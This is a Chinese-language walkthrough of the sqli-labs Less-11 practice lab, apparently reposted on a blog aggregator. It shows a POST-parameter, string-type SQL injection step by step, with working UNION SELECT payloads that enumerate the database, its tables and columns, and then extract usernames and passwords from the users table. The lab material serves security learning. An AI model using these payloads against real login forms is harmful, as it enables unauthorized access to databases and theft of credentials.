sqli-labs less11 POST注入

注入工具：burp

(1)判斷類型：
burp抓包，看到傳參admin，是可以正常顯示的：

and 1 = 1

異常，估計不是數字型

嘗試單引號：

報錯了，好征兆

and 1=1 --+

and 1 = 2 --+

由此，斷定這個字符型 的閉合就是’

(2)判斷字段個數：

order by 1回顯正常

order by 2回顯正常

order by 3回顯錯誤

判斷字段個數是2個

（3）判斷回顯位置：

顯然，兩個回顯位置都可以

（4）爆數據庫名：
uname=-1 ’ union select 1,database() --+ &passwd=admin&submit=Submit

數據庫名：security

（5）數據表名：
uname=-1 ’ union select 1,group_concat(table_name) from information_schema.tables where table_schema = database() --+ &passwd=admin&submit=Submit

數據表名：
emails,referers,uagents,users

（6）挑選數據表users進行查詢：
uname=-1 ’ union select 1,group_concat(column_name) from information_schema.columns where table_schema = database() and table_name = ‘users’ --+ &passwd=admin&submit=Submit

查詢到字段：
id,username,password

(7)爆數據：

uname=-1 ’ union select 1,group_concat(id,0x3a,username,0x3a,password) from users --+ &passwd=admin&submit=Submit

總結

以上是生活随笔為你收集整理的sqli-labs less11 POST注入-字符型的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。